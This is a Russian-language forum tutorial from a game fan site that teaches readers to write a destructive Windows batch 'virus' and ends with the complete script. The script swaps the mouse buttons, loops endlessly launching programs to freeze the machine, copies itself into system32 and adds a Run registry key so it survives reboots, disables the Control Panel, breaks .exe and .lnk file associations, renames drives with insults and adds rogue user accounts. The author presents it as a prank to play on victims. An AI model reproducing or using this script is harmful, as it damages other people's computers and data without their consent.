Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться, пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.
Итак, дальше поехали дальше:

:x ;
Start mspaint
goto x ;

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт:

copy ""%0"" "%SystemRoot%system32File.bat"
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "Filel" /t REG_SZ /d "%SystemRoot%system32File.bat" /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f

Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше))

assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от SMOKED'а, вирусо-писательства. Если же нет. Читаем все заново))
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:Open.bat >nul
copy %0 D:Open.bat >nul
copy %0 E:Open.bat >nul
copy %0 F:Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy ""%0"" "%SystemRoot%system32Cool.bat" >nul
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "Cool" /t REG_SZ /d "%SystemRoot%system32Cool.bat" /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul
Сайт для геймера Фильмы онлайн в хорошем качестве! Смотрите кино всех жанров только в HD!!!


Silicium TES4:Oblivion Crafting -- фан-сайт игры TES4:Oblivion

Silicium TES4:Oblivion Crafting -- фан-сайт игры TES4:Oblivion
-- авторский фан-сайт игры TES4:Oblivion
Добавил: RealHackerПубликацию добавил: RealHacker Дата: 29.11.2011Дата добавления публикации: 29.11.2011


Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Профиль


Top 5
    TOP Пользователей
    vasiliy_petrov245
    Сообщений: 433
    Комментариев: 0
    stepakov
    Сообщений: 428
    Комментариев: 0
    HACKERus
    Сообщений: 95
    Комментариев: 0
    vaskas122
    Сообщений: 79
    Комментариев: 0
    www1
    Сообщений: 63
    Комментариев: 0